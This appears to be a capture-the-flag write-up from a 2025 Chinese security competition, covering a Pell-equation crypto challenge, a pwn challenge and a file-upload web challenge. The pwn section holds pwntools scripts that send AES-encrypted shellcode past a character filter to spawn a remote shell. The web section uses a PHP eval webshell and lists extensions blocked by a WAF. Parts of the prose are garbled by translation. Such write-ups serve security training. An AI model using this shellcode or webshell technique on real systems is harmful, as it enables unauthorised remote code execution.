Title: 2025 Digital China Innovation Competition Digital Security Track Data Security WP

1. Data security questions

1 .AS

View examples and questions and write exp

def pell_recurrence(x1, y1, x, y, D):

x_next=x1 * x + D * y1 * y

y_next=x1 * y + y1 * x

return x_next, y_next

#calculate

def generate_until_threshold(x1, y1, D, threshold):

x, y=1, 0

solutions=[(x, y)]

iteration=0

while True:

x, y=pell_recurrence(x1, y1, x, y, D)

iteration +=1

solutions.append((x, y))

if x threshold and y threshold:

break

return solutions, iteration, (x, y)

##################################################################

def main():

D=42232

x1, y1=10863430363390445672094671043496198963286006933268455141841942775234559999, 52862312812076818203801374519259164308207980652808243827880652144787200

threshold=2 **0x149f

solutions, iterations, last_solution=generate_until_threshold(x1, y1, D, threshold)

print(f' x={last_solution[0]}')

print(f' y={last_solution[1]}')

n1=(last_solution[0] - 1) //2

n2=last_solution[1]

print(n1)

print(n2)

if __name__=='__main__':

main()

n1=6484456464385494958985160233577839841735795804647354190796586547182550378527267882223754238651441651725550102689465473718387558249680778387240949510753434184201786605123847893899093406567717389454538 6342407659205001068135302729237100620243248709910469788678708717889604288162784417431423112537621495419154772986757675855167129919386700726005394167383331284254279498630255373138495682828010693186447810 5747928749942182896044998865749248551237702694523130962244318388047216423763541300420337417782220630444089221596447522910893615324877093077575834234632206558845108059414461593855011448692345628660664306 8395998155316596913497744579744077742423463881471672458781349375368356413765775128419424003099676833789760649723034315709289197588503633098101852953596135719124951778966166882244717559306946188988876913 0598854771926155737315230514752046521202893304056240286346925487675988559705443898301236706180919342302429465894637859344643029018424523547396779994375190095466431959714922380071905524429743822991653088 9482740693358858886945778091075479767043403338315077245817584501204836101045898033382579741708159642221431364092087627932238340345061520303793648076973193990895662534842239113818516252719396503715138316 6115929559837059526120429960898263731511653364200306669261874318917797797511599010768665767007935673823935662067654373217132550990224714558326022862910254573865374743852845589800119354399325882955858912 5426525550586695373047067726351358183887658916360966276066716968285230497455072503555764167568060675739545960438904928347842532194851125250305537530924233133264250758350828806805623873239302114836480000

n2=631077577837315807212150605001212011073700092115983086048740595191397762984508443612849134473582040026490305611506672815790733279455324389749038244192826523764101532018565743490392509759876096077887 8832544423181756899326304063782908439562569708467673549276158693692888001929891891744223454661337998539277783475975019927833495777599483895984131746152326733533402089732453584337320359607883603900037507 8019839415884013345498043473444057860171445618628885820669899955565786433581042661497092955707897522740118225382682538460934652896234403638883250225904674132191120017142678063796240523447446112088083480 9003855463232063187607331663553796062046207210640552948434337370007381441733734803953072245096582393802864729330924382527356098137452931852934251401785618978991521206247075519888904264778862933717556843 876611759454744828205597534256578148852799693013920359743897278354653848976322146722301616470055723006827166136303455670710003638464315811357227470395415655224937948450914818485837106928933473384856351 3562506182502826257198176485230753980573080356791813553201718713496268667916027510756787675230893541319068679146341573352252143049354837542440743305672512279930021618838093554441531642048116980907147626 423248156091825179885062681506303604070652846991305601280740083579032479034947212812440317249494983943341118835003599780758893627981692531706689912199808384763177614409977387670316498292979992834435354912 2389259490732638723303504957174689978086401613054702247774451584115199235037185582727394255585715896600435834403902988987940547963269504370891849450258752419616559584122132413440460209140828641358681600

NC connection submission

Get username:ADMIN-JM password:JM001x!

flag:

md5(ADMIN-JM+JM001x!)

or:

#sage 9.5

from Crypto.Util.number import *

from pwn import *

import sys

sys.set_int_max_str_digits(0)

def interact(io, x, y):

io.recvuntil(b':')

io.sendline(b'2')

io.recvuntil(b'n1~')

io.sendline(str(x).encode())

io.recvuntil(b'n2~')

io.sendline(str(y).encode())

io.recvline()

return io.recvline()

D=42232

check=2 **0x149f

def solve_pell(N):

cf=continued_fraction(sqrt(N))

i=0

whileTrue:

i +=1

denom=cf.denominator(i)

numer=cf.numerator(i)

if (((numer - 1) //2)=check) or (denom=check):

Continue continue

if numer^2 - N * denom^2==1:

x, y=int((numer - 1) //2), int(denom)

res=interact(io, x, y)

ifb'Sorry'in res:

Continue continue

Return res

io=remote('47.117.41.252', '33410')

context.log_level='debug'

res=solve_pell(D)

print(res)

io.interactive()

#b'Verify success!Your username[ADMIN-JM], your password[JM001x!]~'Final flag:

b7133d84297c307a92e70d7727f55cbc

2.SCSC

Title description:

Use program vulnerabilities to obtain data information in info_sec file and submit data in row 11, column 2

Process of the question: When I got the scsc binary file, I found that it was statically compiled, and there was no library function, and the symbol table was missing, resulting in the library function having no name

Here we use the reverse technique, there are three ways to restore some symbol tables

Use different versions of sig files, try to restore the use of bindiff, use different libc files, compare the machine code of the library function, and use the fingerprint plugin to restore the function name (need to be connected to the Internet). I personally think the most effective effect is the fingerprint plugin. This game is also constantly online, so I use it. It not only recognizes libc, but without it, I don’t know that I also used C++ libraries. Here we show the effect after recovery

This program is an AES decryption function set shellcode executor and disables some visible characters. We need to encrypt and transmit shellcode without filtering characters.

Here is the easiest way to create a read using shellcode, jump, and then enter an ordinary shellcode. The visible character filtering here limits "sh" and various 64-bit register operations. So I used 32 bit registers, easily bypassed, turned on sys_read, inject shellcode, getshell

from pwn import *

from std_pwn import *

from Crypto.Cipher import AES

from Crypto.Util.Padding import pad

defgetProcess(ip,port,name):

Global P

iflen(sys.argv) 1and sys.argv[1]=='r':

p=remote(ip, port)

Return p

else:

p=process(name)

Return p

sl=lambda x: p.sendline(x)

sd=lambda x: p.send(x)

sa=lambda x, y: p.sendafter(x, y)

sla=lambda x, y: p.sendlineafter(x, y)

rc=lambda x: p.recv(x)

rl=lambda: p.recvline()

ru=lambda x: p.recvuntil(x)

ita=lambda: p.interactive()

slc=lambda: asm(shellcraft.sh())

uu64=lambda x: u64(x.ljust(8, b'\0'))

uu32=lambda x: u32(x.ljust(4, b'\0'))

# return sl, sd, sa, sla, rc, rl, ru, ita, slc, uu64, uu32

defaes_ecb_encrypt(plaintext):

print(plaintext)

for c inb'0MOyhjlcit1ZkbNRnCHaG':

if c in plaintext:

print(f'{chr(c)} in it !')

# Convert hexadecimal string key to bytes

key=b'862410c4f93b77b4'

# Create an AES encryptor

cipher=AES.new(key, AES.MODE_ECB)

# Fill in and encrypt the plain text

padded_plaintext=pad(plaintext, AES.block_size)

ciphertext=cipher.encrypt(padded_plaintext)

# Convert ciphertext to hexadecimal string and return

return ciphertext

shellcode='''

push rsp

pop rsi

mov edi,0

mov edx,0xff

push rdi

pop rax

syscall

jmp rsp

'''

# 01ayhcjitkbn MOlZNRCHG

p=getProcess('47.117.42.74',32846,'./scsc')

context(os='linux', arch='amd64', log_level='debug',terminal=['tmux','splitw','-h'])

elf=ELF('./scsc')

gdba()

payload=asm(shellcode)

sa('magic data:',aes_ecb_encrypt(asm(shellcode)))

sl(asm(shellcraft.sh()))

ita() or

#!/usr/bin/env python3

from pwn import *

context.log_level='debug'

context.arch='amd64'

# io=process('./scsc')

io=remote('47.117.41.252',33414)

shellcode='''

xchg r8, rax

xchg r8, rsi

sub edi, edi

mov edx,0x99

sub eax, eax

syscall

'''

payload1=asm(shellcode)

print('shellcode=', payload1.hex())

payload1=bytes.fromhex('e29aca48e52d1d59c539c172262e56c7aeae3b0ebb4e872fa01f84506ad7c226')

payload2=b'\x90'*len(payload1) + asm(shellcraft.sh())

# gdb.attach(io)

io.sendlineafter(b'magic data:', payload1)

pause()

io.send(payload2)

io.interactive()

3.ez_upload

Title description:

There is no attachment to the test question in this question, please ignore the attachment download button! A server stores the RSA key file for encrypted data. The administrator did not repair the vulnerable test site in time when maintaining the server site. Please submit the path where the RSA key is located (submission style: If the path where the file is located is /var/www, the submission answer is /var/www)

Problem procedure:

Preliminary idea, pass on horse, getshell, and then find files related to RSA

html and php are all dropped by waf. The suffix may be used to detect the file content.

Content-Type: text/html Waf this

The suffix was wafed, html, php,htaccess,'.php','.php5','.php4','.php3','.php2','.html','.htm','.pht','.pht','.pHp','.pHp5','.pHp4','.pHp3','.pHp2','.Html','.Htm','.pHtml,user.ini

Echoing as NOT THIS. But the echo of the phtml suffix is NOT THIS CONTEHT

php7.2 or above, htaccess file needs to be configured

It's not png 2 rendering

The middleware is apache, resolve vulnerability?

It is found that the file content is checked, and the content containing php will be dropped by waf.

Successfully passed on horse

?=@eval($_POST['cmd']);

The path to find the RSA key is /var/www/rssss4a

4.Data disclosure and privacy protection

Title description:

As a technical support staff member of a publicity department, when conducting an activity to publicly commend outstanding volunteers, due to excessive data desensitization, the personal information cannot be accurately identified, resulting in

Multiple volunteers are confused about information. Please solve the problem according to the task requirements of 《题目说明文档》 in the attachment.

Problem procedure:

Entry :open file - table base64 encryption - use time() to generate pseudo-random array - Exoor encryption - write to new file